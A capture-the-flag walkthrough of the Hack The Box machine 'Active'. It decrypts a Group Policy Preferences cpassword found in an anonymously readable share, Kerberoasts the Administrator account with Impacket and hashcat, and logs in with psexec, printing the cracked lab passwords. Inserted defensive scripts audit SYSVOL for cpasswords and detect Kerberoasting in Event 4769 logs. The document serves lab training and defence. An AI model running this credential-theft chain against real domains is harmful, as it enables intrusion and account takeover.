HTB: Active
Information Gathering
nmap
$ sudo nmap --min-rate 10000 -p- -oA nmapscan/ports 10.129.1.72 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 14:54 CST
Warning: 10.129.1.72 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.1.72
Host is up (0.52s latency).
Not shown: 44639 closed tcp ports (reset), 20874 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
49171/tcp open unknown
49173/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 70.49 seconds
smb-445
$ smbclient -L //10.129.1.51/ -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Trying the shares one by one, only Replication allows anonymous access; download the whole Replication share locally for analysis.
Look at the file structure:
$ tree
.
├── DfsrPrivate
│ ├── ConflictAndDeleted
│ ├── Deleted
│ └── Installing
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── Group Policy
│ │ │ └── GPE.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ │ └── Groups.xml
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
22 directories, 7 files
This directory structure is the SYSVOL share of a Windows domain controller; when we access SYSVOL later, its contents turn out to be identical to these files.
SVC_TGS
Groups.xml
The Policies folder holds the concrete settings of the Group Policy Objects (GPOs).
DFS Replication exists to synchronise. When a domain has several domain controllers (DCs), DFSR makes sure that changes made to Policies on DC A are automatically replicated to DC B. Microsoft's description: "DFS Replication enables you to efficiently replicate folders (including those referred to by a DFS namespace path) across multiple servers and sites. DFS Replication uses a compression algorithm known as remote differential compression (RDC). RDC detects changes to the data in a file and enables DFS Replication to replicate only the changed file blocks instead of the entire file."
After some searching, the file that deserves our attention is Groups.xml. In older versions of Windows Server, an administrator could use Group Policy to set the local administrator password on every workstation in bulk. That password is stored, encrypted, in the cpassword attribute of Groups.xml. Microsoft published the AES key used to encrypt it in 2012. This means that anyone who can read the XML file (ordinary domain users normally have read access) can decrypt the plaintext password.
Looking at Groups.xml, there is indeed a cpassword field, which gave me confidence:
$ cat Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
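From the defender's side, the useful check is not decrypting cpassword values but finding every GPP XML file that still carries one, because each such attribute is a credential that must be treated as plaintext and rotated, and the preference item removed. The following script is an added example for this write-up (not code from the page or from gpp-decrypt): it walks a copy of SYSVOL, parses the Group Policy Preferences files that can hold a cpassword, and reports the affected account, the GPP action and the last-changed timestamp. SAMPLE_GROUPS_XML is the Groups.xml shown above; the Policies/{GUID}/MACHINE/Preferences/Groups/Groups.xml layout that demo() builds in a temporary directory is the standard SYSVOL tree, and the list of file names and account attributes is assumed from the GPP schema rather than taken from this page.

```python
"""Audit a local copy of SYSVOL for Group Policy Preferences passwords.

Added example for this write-up; not code from the original page or from
gpp-decrypt. Any GPP XML that still carries a cpassword attribute is a
finding in itself: the AES key protecting it is public, so the value has to
be treated as a plaintext credential and the account rotated.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that can carry a cpassword attribute (assumed from the
# GPP schema, matched case-insensitively).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

# Attributes that name the account the password belongs to, by file type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# GPP action codes found on the Properties element.
ACTIONS = {"C": "Create", "R": "Replace", "U": "Update", "D": "Delete"}

# The Groups.xml from this page, embedded as sample input.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>
"""


def find_cpasswords(xml_data, source="<string>"):
    """Return one finding per Properties element that carries a cpassword."""
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")
    try:
        root = ET.fromstring(xml_data)
    except ET.ParseError as exc:
        return [{"file": source, "error": f"unparseable XML: {exc}"}]
    findings = []
    # Walk every element so the parent (User, Group, NTService, ...) is known;
    # it carries the 'name' and 'changed' attributes worth reporting.
    for parent in root.iter():
        for props in parent.findall("Properties"):
            cpassword = props.get("cpassword")
            if cpassword is None:
                continue
            account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), None)
            findings.append({
                "file": source,
                "element": parent.tag,
                "name": parent.get("name"),
                "changed": parent.get("changed"),
                "account": account,
                "action": ACTIONS.get(props.get("action", ""), props.get("action")),
                "cpassword": cpassword,
            })
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL copy and collect cpassword findings from every GPP file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                findings.extend(find_cpasswords(fh.read(), path))
    return findings


def demo():
    """Build a throw-away SYSVOL tree holding the sample Groups.xml and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpo = os.path.join(tmp, "Policies", "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                           "MACHINE", "Preferences", "Groups")
        os.makedirs(gpo)
        with open(os.path.join(gpo, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_sysvol(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}: {f['element']} {f['name']} account={f['account']} "
              f"action={f['action']} changed={f['changed']}")
```

Run it against a mirrored SYSVOL (`scan_sysvol("/path/to/sysvol")`) or a single file (`find_cpasswords(open(p, "rb").read(), p)`); any non-empty result is a finding regardless of whether the value decrypts, and a file that fails to parse is reported rather than silently skipped.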
Now all that is needed is a decryption script. gpp-decrypt looks good! The -c parameter takes the password string.
$ python3 gpp-decrypt.py -c "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
/home/meraki/notes/HTB/Active/gpp-decrypt/gpp-decrypt.py:13: SyntaxWarning: invalid escape sequence '\ '
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ * ] Password: GPPstillStandingStrong2k18
We now have a set of credentials: active.htb\SVC_TGS:GPPstillStandingStrong2k18
user.txt
Accessing SMB again with these credentials, SYSVOL contains the active.htb folder seen earlier:
$ smbclient //10.129.1.72/SYSVOL -U "SVC_TGS"
Password for [WORKGROUP\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 19 02:48:57 2018
.. D 0 Thu Jul 19 02:48:57 2018
active.htb Dr 0 Thu Jul 19 02:48:57 2018
Users is also accessible; it appears to be the Users folder on the target machine:
$ smbclient //10.129.1.72/Users -U "SVC_TGS"
Password for [WORKGROUP\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 22:39:20 2018
.. DR 0 Sat Jul 21 22:39:20 2018
Administrator D 0 Mon Jul 16 18:14:21 2018
All Users DHSrn 0 Tue Jul 14 13:06:44 2009
Default DHR 0 Tue Jul 14 14:38:21 2009
Default User DHSrn 0 Tue Jul 14 13:06:44 2009
desktop.ini AHS 174 Tue Jul 14 12:57:55 2009
Public DR 0 Tue Jul 14 12:57:55 2009
SVC_TGS D 0 Sat Jul 21 23:16:32 2018
10459647 blocks of size 4096. 5202233 blocks available
user.txt is found in SVC_TGS\Desktop:
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 23:14:42 2018
.. D 0 Sat Jul 21 23:14:42 2018
user.txt AR 34 Sat Jan 10 02:02:30 2026
Download it locally and read it.
Administrator
Kerberoasting
Port 88 is open on the target, and we now hold domain user credentials, so we can attempt Kerberoasting. Kerberoasting requests TGS tickets for accounts that have an SPN set and cracks them offline to recover those accounts' plaintext passwords.
$ GetUserSPNs.py -dc-ip 10.129.1.72 active.htb/SVC_TGS -request
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 03:06:40.351723 2026-01-10 02:02:34.244143
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$190729e5bb45c13b2e409cfdc9675ab9$...[omitted]...
As it happens, Administrator has an SPN set, so we crack the ticket directly:
$ hashcat -m 13100 admin.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
...[omitted]...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$190729e5bb45c13b2e409cfdc9675ab9$...[omitted]...:Ticketmaster1968
Administrator:Ticketmaster1968
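The ticket request above leaves a trace on the domain controller: every TGS request is logged as Security Event ID 4769, and hashcat mode 13100 only applies to RC4-HMAC tickets (encryption type 0x17), which is exactly what `$krb5tgs$23$` denotes. The following detection script is an added example for this write-up, not code from the page or from Impacket. It parses 4769 records, raises an alert for any RC4 service ticket issued for a non-machine account (the single Administrator request seen on this box), and, going beyond this page's single-SPN case, also flags one account requesting tickets for many distinct service accounts within a short window, which is how a GetUserSPNs.py run looks in a larger domain. The line format and SAMPLE_4769_EVENTS are constructed for this example; map the fields from your own SIEM's 4769 export accordingly, and the `jdoe` and `svc1..svc5` names are invented.

```python
"""Flag Kerberoasting activity in Kerberos service-ticket (Event ID 4769) logs.

Added example for this write-up, not code from the page or from Impacket.
Two rules: an RC4-HMAC (etype 0x17) service ticket for a non-machine account,
and a burst of distinct service-account tickets from one requester.
"""
import re
from collections import defaultdict
from datetime import datetime

# Kerberos encryption types as they appear in the 4769 'Ticket Encryption Type' field.
RC4_HMAC = 0x17
AES128_CTS_HMAC_SHA1 = 0x11
AES256_CTS_HMAC_SHA1 = 0x12

# Constructed sample export of 4769 events (field names are this example's own).
SAMPLE_4769_EVENTS = """\
2026-01-10T02:02:30Z EventID=4769 Account=SVC_TGS@ACTIVE.HTB Service=DC$ Etype=0x12 Status=0x0
2026-01-10T02:02:31Z EventID=4769 Account=SVC_TGS@ACTIVE.HTB Service=krbtgt Etype=0x12 Status=0x0
2026-01-10T02:02:34Z EventID=4769 Account=SVC_TGS@ACTIVE.HTB Service=Administrator Etype=0x17 Status=0x0
2026-01-10T09:15:00Z EventID=4769 Account=jdoe@ACTIVE.HTB Service=sqlsvc Etype=0x12 Status=0x0
2026-01-10T10:00:00Z EventID=4769 Account=jdoe@ACTIVE.HTB Service=svc1 Etype=0x12 Status=0x0
2026-01-10T10:00:01Z EventID=4769 Account=jdoe@ACTIVE.HTB Service=svc2 Etype=0x12 Status=0x0
2026-01-10T10:00:02Z EventID=4769 Account=jdoe@ACTIVE.HTB Service=svc3 Etype=0x12 Status=0x0
2026-01-10T10:00:03Z EventID=4769 Account=jdoe@ACTIVE.HTB Service=svc4 Etype=0x12 Status=0x0
2026-01-10T10:00:04Z EventID=4769 Account=jdoe@ACTIVE.HTB Service=svc5 Etype=0x12 Status=0x0
2026-01-10T10:00:05Z EventID=4769 Account=jdoe@ACTIVE.HTB Service=svc1 Etype=0x12 Status=0x0
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\S+)\s+EventID=4769\s+Account=(?P<account>\S+)\s+Service=(?P<service>\S+)"
    r"\s+Etype=(?P<etype>0x[0-9a-fA-F]+)\s+Status=(?P<status>0x[0-9a-fA-F]+)"
)


def parse_events(text):
    """Parse the constructed export into dicts; lines that are not 4769 are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        ev["etype"] = int(ev["etype"], 16)
        ev["status"] = int(ev["status"], 16)
        events.append(ev)
    return events


def is_roastable_service(name):
    """Machine accounts (trailing '$') and the krbtgt TGT service are not Kerberoast targets."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def detect_kerberoasting(events, burst_threshold=5, window_seconds=60):
    """Return alerts for RC4 tickets on user-type service accounts and for SPN bursts."""
    alerts = []
    per_account = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        # Only successful tickets (Status 0x0) for user-type service accounts matter.
        if ev["status"] != 0 or not is_roastable_service(ev["service"]):
            continue
        if ev["etype"] == RC4_HMAC:
            alerts.append({"rule": "rc4_tgs", "account": ev["account"],
                           "service": ev["service"], "ts": ev["ts"].isoformat()})
        per_account[ev["account"]].append(ev)
    # Sliding window: many distinct service accounts from one requester in a short time.
    for account, evs in per_account.items():
        for i, start in enumerate(evs):
            window = [e for e in evs[i:]
                      if (e["ts"] - start["ts"]).total_seconds() <= window_seconds]
            services = sorted({e["service"] for e in window})
            if len(services) >= burst_threshold:
                alerts.append({"rule": "spn_burst", "account": account,
                               "services": services, "ts": start["ts"].isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(parse_events(SAMPLE_4769_EVENTS)):
        print(alert)
```

The RC4 rule is the high-signal one: once service accounts are configured for AES only (the msDS-SupportedEncryptionTypes attribute) and use long random or gMSA-managed passwords, an RC4 service ticket for such an account should not occur at all, and any 4769 with etype 0x17 becomes worth a ticket. The burst rule catches a tool enumerating every SPN in the domain, which this page's single-SPN host would not trigger.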
root.txt
Log in directly with psexec.py:
$ psexec.py administrator@10.129.1.72
root.txt is under Administrator\Desktop:
C:\Users\Administrator\Desktop> type root.txt
97e464861...[omitted]...